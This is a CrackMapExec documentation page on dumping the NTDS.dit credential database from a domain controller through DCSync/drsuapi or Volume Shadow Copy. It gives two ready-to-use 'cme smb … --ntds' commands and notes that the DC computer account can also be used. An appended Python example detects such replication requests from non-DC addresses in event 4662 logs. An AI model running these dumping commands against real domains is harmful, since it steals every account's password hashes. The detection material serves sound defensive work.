Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin privileges on the target Domain Controller.

2 methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resultant linked lists into a readable format
vss - Uses the Volume Shadow Copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSYNC with the computer account of the DC
Remember to play this music every time you get DA
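For defenders, the drsuapi method and the DC computer-account variant both show up as directory replication access in the DC's Security log. The following is an added example, not part of CrackMapExec or the original page: it flags replication requests by the source address of the logon session instead of by account name, so a DC machine account used from a non-DC host is still caught. It assumes Directory Service Access auditing is producing event 4662; the DC address inventory and all events are constructed sample data.

```python
# Added example: flag directory-replication requests (the drsuapi method)
# whose logon session did not originate from a known domain controller.
# All events below are constructed sample data, not real logs.

REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # ...-Get-Changes-In-Filtered-Set
}

def find_suspect_replication(events, dc_ips):
    """Return sorted (user, source_ip) pairs for 4662 replication access
    from sessions whose 4624 source address is not a known DC."""
    # Map logon session id -> source IP from logon events (4624).
    session_ip = {e["TargetLogonId"]: e["IpAddress"]
                  for e in events if e["EventID"] == 4624}
    hits = set()
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = e.get("Properties", "").lower()
        if not any(g in props for g in REPL_GUIDS):
            continue
        ip = session_ip.get(e["SubjectLogonId"], "unknown")
        # Decide on source address, not account name: a DC machine account
        # used from a non-DC host must still be flagged.
        if ip not in dc_ips:
            hits.add((e["SubjectUserName"], ip))
    return sorted(hits)

DC_IPS = {"192.168.1.100", "192.168.1.101"}  # assumed DC inventory
SAMPLE = [  # constructed events
    {"EventID": 4624, "TargetLogonId": "0x1a1", "IpAddress": "192.168.1.101"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x1a1",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TargetLogonId": "0x2b2", "IpAddress": "192.168.1.50"},
    {"EventID": 4662, "SubjectUserName": "UserNAme", "SubjectLogonId": "0x2b2",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4624, "TargetLogonId": "0x3c3", "IpAddress": "192.168.1.50"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3c3",
     "Properties": "{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "SubjectUserName": "svc", "SubjectLogonId": "0x4d4",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for user, ip in find_suspect_replication(SAMPLE, DC_IPS):
        print(f"replication request by {user} from {ip}")
```

Legitimate DC-to-DC replication (DC02$ from 192.168.1.101) is not reported; a 4662 event with no matching logon session is reported with source "unknown" so it can be reviewed.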